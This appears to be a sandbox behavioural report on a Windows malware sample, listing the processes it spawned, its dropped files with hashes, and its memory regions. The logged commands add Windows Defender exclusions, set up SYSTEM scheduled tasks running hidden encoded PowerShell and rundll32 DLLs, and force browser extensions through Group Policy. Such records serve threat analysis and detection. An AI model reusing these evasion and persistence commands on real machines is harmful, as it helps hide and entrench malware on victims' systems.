"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gDVVmaqMc" /SC once /ST 01:51:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gDVVmaqMc"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gDVVmaqMc"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 01:17:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe\" XT /dEsite_idNZT 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BAnwxolbGpCzXNxkj"

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe XT /dEsite_idNZT 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\vAeHwP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\WUGGbkD.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "qbSDwEgyNYPZlGA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\YCfxMSe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\AvKHovV.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\rYBRMvB.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\aQbGfpM.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 12:41:20 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll\",#1 /LHsite_idkmI 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "QhciBzJOokLnyYZub"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll",#1 /LHsite_idkmI 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll",#1 /LHsite_idkmI 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"

Network

Files

C:\Users\Admin\Pictures\l6LSdyUHXm4SFBWhR2naUyoe.exe

C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe

C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe

C:\Windows\System32\GroupPolicy\gpt.ini

C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe

MD5 7ea234dfc011f40047e769b15ebe661b
SHA1 5a779733891b290d45b3009eb4ceb17c41a2401d
SHA256 c7c0f3e7c270835c0af43a4103d9ef95f85f3ce48d7ab7863d1d3a2fae1847c8
SHA512 71f90fcd6f1c72ab8e9498ff811982db7dd0aa28bb384e8642b3dd75db7b699d853725930eba629e7fa27449bd876a70c8be2619ebc09f514ae06cde714bc9fd

memory/1756-72-0x0000000003A80000-0x0000000003E87000-memory.dmp

memory/1756-73-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/1756-74-0x0000000003E90000-0x000000000477B000-memory.dmp

memory/2164-86-0x0000000003A00000-0x0000000003E06000-memory.dmp

memory/3936-87-0x0000000004E80000-0x0000000004EB6000-memory.dmp

memory/3936-88-0x0000000005640000-0x0000000005C68000-memory.dmp

memory/2164-89-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/3936-90-0x0000000005000000-0x0000000005010000-memory.dmp

memory/2468-92-0x0000000074A20000-0x00000000751D0000-memory.dmp

memory/3936-91-0x0000000005CB0000-0x0000000005CD2000-memory.dmp

memory/3936-93-0x0000000074A20000-0x00000000751D0000-memory.dmp

memory/3936-94-0x0000000005000000-0x0000000005010000-memory.dmp

memory/3936-95-0x0000000005D50000-0x0000000005DB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dnuisomx.nia.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3936-101-0x0000000005E30000-0x0000000005E96000-memory.dmp

memory/2468-106-0x00000000052E0000-0x00000000052F0000-memory.dmp

memory/3936-107-0x0000000005FA0000-0x00000000062F4000-memory.dmp

memory/768-109-0x0000000000400000-0x0000000001A40000-memory.dmp

memory/4936-110-0x0000000074A20000-0x00000000751D0000-memory.dmp

memory/4936-111-0x0000000004B50000-0x0000000004B60000-memory.dmp

memory/768-112-0x0000000001CA0000-0x0000000001DA0000-memory.dmp

memory/3936-114-0x0000000006460000-0x000000000647E000-memory.dmp

memory/4936-113-0x0000000004B50000-0x0000000004B60000-memory.dmp

memory/3936-115-0x00000000069D0000-0x0000000006A1C000-memory.dmp

memory/4592-116-0x0000000140000000-0x00000001408B7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ulc.0.exe

MD5 513e1df3bd8755c988baf3f682d3abc0
SHA1 909fa3f20c167213d94c6edc50bb43672d8cb41e
SHA256 9f8af4317529d2b35ddafa1b74a2379695cf0c68ef2639141fe0e875692b9e9d
SHA512 c838f5520bbd320c53a7daa536eef16cc819abf509b973d570e93a7906c5dafa569e07a81c11b73637daf8ff8e03aa508ef0825f3e5a36c8d98b3764cadb4ba4

memory/4592-134-0x00007FF86AAD0000-0x00007FF86ACC5000-memory.dmp

memory/1572-136-0x0000000003650000-0x0000000003677000-memory.dmp

memory/1572-135-0x0000000001A70000-0x0000000001B70000-memory.dmp

memory/1572-137-0x0000000000400000-0x0000000001A19000-memory.dmp

memory/3936-138-0x0000000006920000-0x0000000006964000-memory.dmp

memory/3936-139-0x0000000007780000-0x00000000077F6000-memory.dmp

memory/3936-140-0x0000000007E80000-0x00000000084FA000-memory.dmp

memory/3936-141-0x0000000007820000-0x000000000783A000-memory.dmp

memory/3936-142-0x00000000079E0000-0x0000000007A12000-memory.dmp

memory/1756-144-0x0000000003A80000-0x0000000003E87000-memory.dmp

memory/3936-145-0x000000006F700000-0x000000006FA54000-memory.dmp

memory/3936-155-0x0000000007A20000-0x0000000007A3E000-memory.dmp

memory/3936-156-0x0000000007A40000-0x0000000007AE3000-memory.dmp

memory/3936-158-0x000000007F990000-0x000000007F9A0000-memory.dmp

memory/1756-157-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/3936-143-0x000000006FF80000-0x000000006FFCC000-memory.dmp

memory/3936-159-0x0000000005000000-0x0000000005010000-memory.dmp

memory/3936-160-0x0000000007B30000-0x0000000007B3A000-memory.dmp

memory/1572-161-0x0000000000400000-0x0000000001A19000-memory.dmp

memory/3936-162-0x0000000007BF0000-0x0000000007C86000-memory.dmp

memory/3936-163-0x0000000007B50000-0x0000000007B61000-memory.dmp

memory/4936-166-0x000000007F190000-0x000000007F1A0000-memory.dmp

memory/4936-167-0x000000006FF80000-0x000000006FFCC000-memory.dmp

memory/4936-168-0x000000006F700000-0x000000006FA54000-memory.dmp

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe

MD5 fb2fa33d9a08da7e95b553ff8487e328
SHA1 5f0329ccc8dfed784353ec12fac5efc80384c1ee
SHA256 d8d7763ece24d6ffb9544171f5af36f3fc3bca7fba3f872752adf0dce521b661
SHA512 6be950c2ca60153eb33357ceadf8fbf2cf9019bf7103d050cc772b3403f486d268d7e079df21ef8333c5bf7753bf5c7ec42ca04bae09e47c76d955cac29478d9

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2404191404507553208.dll

MD5 0415cb7be0361a74a039d5f31e72fa65
SHA1 46ae154436c8c059ee75cbc6a18ccda96bb2021d
SHA256 bb38a8806705980ee3e9181c099e8d5c425e6c9505a88e5af538ca6a48951798
SHA512 f71c2b9e1559aa4eb2d72f852ef9807c781d4a7b96b8e0c2c53b895885319146bd43aa6e4223d43159f3d40bc60704206404dc034500e47fca0a94e53b60239e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 d95bb2433432984a05ff6febc5952649
SHA1 c34d05f432a6d998f946896ae41bcef758b1398d
SHA256 aba97c4dab0eecba7b5d330995c60f4ea4268c2edb63201b30ffbb453ba2ce87
SHA512 62af186de5e31aea06e990adac6e836ded9d279bd01018ef9f4eaea751c29ef6c844a43114df35e2ef8a383c7dae973ba99b09eabd6df213842cbfcbcbca5e4b

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 1de04f96914b420ce2fced5336765d97
SHA1 c60bd7f83cad273e1d98aecaba41e39457778482
SHA256 496f940ab9a8c051bb48f7779e20da440e698c03a50fe9f7753d4249d59752b8
SHA512 bec1c056bae68423b50dddbf622ed1f84f0150a7da867ce91320066d4be1ab47d6402e367f352fa17eba24616ad9ceaf6fe78481cf254c062b8b5a594e487527

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 a6ea7bfcd3aac150c0caef765cb52281
SHA1 037dc22c46a0eb0b9ad4c74088129e387cffe96b
SHA256 f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9
SHA512 c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23

memory/768-242-0x0000000000400000-0x0000000001A40000-memory.dmp

memory/1756-251-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/2164-295-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/4364-296-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/4804-297-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\opera_package

MD5 5014156e9ffbb75d1a8d5fc09fabdc42
SHA1 6968d1b5cec3039e53bbbedeee22e2d43d94c771
SHA256 7a01e11e1830ba3c154e5a6c383da15938b1e48f89a2fe4045cdd260924b6802
SHA512 bfc5c44881d0fa7bcbccfd530d874fa624adec50e1a16063a72de12876d2db10ca5edd6fa841ea63e9deca3ff2adf54065f50719fe051d41de92bb68edba4016

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 f389cb4db9d1eba54d7892fb5467be38
SHA1 ac8a660e5a758462069f8b08504ef4cf25802000
SHA256 4f03fe3f5b727ec12bf8a2beb1ddf00bfc6cbd3bcca6f49510f4fad5734bb939
SHA512 989c3ae4ae4f7c5d207cc1cdd2c16983e37eb9600f222c5367dad7607c4a1186c7b69d74ca55fe8e8c0137a1f73ef6bf0138cfd946122df9fb1388ba633efdb0

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6cfd1c02ada13c47a6c0e4384016798f
SHA1 66d60265c0d3d2db38c9cad2357915c3d6078889
SHA256 c3803e966366657282f4008f1700fe2cac66402c84b5e10e7d703e29c8a182f0
SHA512 098f50dc8bd17fc9de3123df2ba2b7318b6bf7a1e9b01794cd7990530ce67909d0e3eac0ee9d283ef88ebb104578478f5905c5c76ee9168765690356a722e400

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

MD5 15d8c8f36cef095a67d156969ecdb896
SHA1 a1435deb5866cd341c09e56b65cdda33620fcc95
SHA256 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
SHA512 d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe

MD5 976bc8e5fe65f9bb56831e20f1747150
SHA1 f9e7f5628aaaabed9939ef055540e24590a9ccfb
SHA256 f53c916ccf3d24d6793227283de2db0f6cc98a2275413851807cc080643d21a0
SHA512 2858e7e08418b170b21b599afb02236d0480d35a5605de142f10976489e01daf2ad80df0f09c2eb38bc5a971336d1f6aa9909c520bcdb18e9c9a8e903379dcd9

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\dbgcore.dll

MD5 9ebb919b96f6f94e1be4cdc6913ef629
SHA1 31e99ac4fba516f82b36bd81784e8d518b32f9df
SHA256 fdae21127deb16eb8ba36f2493d2255f4cb8ab4c18e8bd8ba5e587f5a7ecd119
SHA512 a1b42f7d2896da270bb3c80cf9b88c4b4f1491084e7aa7760eeea5533b26f041dc79b21d5ffd2bba2221fe118e0a8d912e170f24fd895c9315b1ee9c7adfe700

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\dbghelp.dll

MD5 544255258f9d45b4608ccfd27a4ed1dd
SHA1 571e30ceb9c977817b5bbac306366ae59f773497
SHA256 3b02fc85602e83059f611c658e3cad6bc59c3c51214d4fe7e31f3ac31388dd68
SHA512 2093da881fa90eec2b90d1ca6eaaff608fe16ac612571a7fd5ed94dd5f7ff7e5c1e8c862bab0a228850829527886473e3942abd23a81d10cab8f9baad2cc7664

memory/4804-507-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/4364-511-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 cd959341129ee16e6ba3e3e9509aa1cc
SHA1 233784d46d17530a7a3bb6b851923e97d3ee0980
SHA256 601262fd2f916223f6993b69f9f3625f03d8e7e8e6c9a3b0ea4bd31cbd5c70fc
SHA512 5cf39fe719011762408990cd9c50fc02b25998aeeb9c72e5f272c6952f0cf4559be6129f6accab1868124a05777ba726df3f33cac450d520d06a7d95e85c581b

memory/4364-518-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ulc.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/768-563-0x0000000000400000-0x0000000001A40000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 bd77d3f5f5f5b6d6a9f831a75e674fdd
SHA1 9e0d39064f4ebf0755ae05bb41b6c098d7ed8566
SHA256 0004703d28163c6eaf7b8d5fd7e1981a234e528a4d691df79819b76883f0f75a
SHA512 43c5d1a6acd675fae1f268146cd0c19712dd2661ebf78fa81c06cdfeac72d461d7d1b4d7eb613145d55fad1648945d1dd5fa5a1520a8b6c3687dabdd2c342a1b

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 2d2019a34d1bf37267d209a16145d96f
SHA1 b6685e89f667a479b48eaf8418e6313124f0c328
SHA256 e16b1a0ce463db313e8bc9c7b0102aa33c15ba86226fb470b12db962f4cf6f25
SHA512 5c4ba51f43cad2d6f0fdf93bd97156beeaa435e733b1d8f5b1e94c0603fecf278c3474a3ade03217b148bd7b293d8c7f3df38d0bd07c8022c8cf80c57b78ee3d

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe

MD5 aaa56797070369ad346fbd9bb6cc5e8b
SHA1 a1d01943f0a354d3a000628262671254ca6a91b8
SHA256 9d7d08ac35f0113f7c814d257bf88b8222975aaa0a3fdeda88ac7185dbc50905
SHA512 e69d25a158567c6bce6e9450de17d0814b9b9c11f4bb31e5dcc3e8b4378062cc7e31da625f6ba4a2280b393034a6c832a0fc0a1e16364dc7e8c8146de245b5be

memory/2604-673-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe

MD5 e77964e011d8880eae95422769249ca4
SHA1 8e15d7c4b7812a1da6c91738c7178adf0ff3200f
SHA256 f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50
SHA512 8feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade

memory/4860-676-0x0000000010000000-0x0000000013BC3000-memory.dmp

memory/3204-682-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/3204-712-0x0000000000400000-0x00000000008AD000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/2604-739-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/2560-749-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2604-765-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/3512-766-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2604-774-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/5440-779-0x0000000010000000-0x0000000013BC3000-memory.dmp

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

memory/2604-801-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa8dd57ca30513418d88cce7123f75a3
SHA1 5c2f9b0ff200174b92816767b77b154713fb9f71
SHA256 7f622bb24b1025d73781d0c35cbd3e3f88d78944cadd8240f45785e385253e2f
SHA512 25a9b324a6e65ca2e4e757d354f126e0b04b68bd75d541a014657cde98e49a925aa2d269ad21a5e10d6a8be75a83ef03c138c8e6d1ebfd6b25f41e0874b516ab

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

memory/2604-839-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/3512-840-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2604-846-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 e30e3a5b5d1c4e01fc04a5f640489258
SHA1 d45f8ee1f500d3f525cc02fd991607187009ebd2
SHA256 1e7bc119fa3771f6a792cb4cb6e1f9e11e946fbb1ddd70fc46e59bc0ee97b3f9
SHA512 7d8eb050127c24247f84adda42c396cf317c3f973c692dfe32bdabeffd16c33f6ca67c653ffa1964d3b88306f8fe616c7a751b6d43018b8649c3d0cc05f9b27a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\prefs.js

MD5 5c02b5c4f94d718edcd4c0e6fd296aa6
SHA1 8be9f3f2b7b9c91e7be2d918c3e90893aa7b7e2b
SHA256 d9a5cde26a454372adc408ae242dd05110a90c3c48cf873169e524d905b66d06
SHA512 96e5495f0519947ca35a91b5f36aec2583d4d333e0b8e75e4850ec160aabfeaf17a85f89c72e76ed956c8c16edfa79931411a92809bbb2e81c8b682f7c98af51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 37578b05f30079dfab9402d840965c77
SHA1 c386b95d64a15f1f4a3c6906446556d303713940
SHA256 8ed96ba8583756f2527ef70bff78cb9bf2afb7d7c1a5214e321feeef245522a7
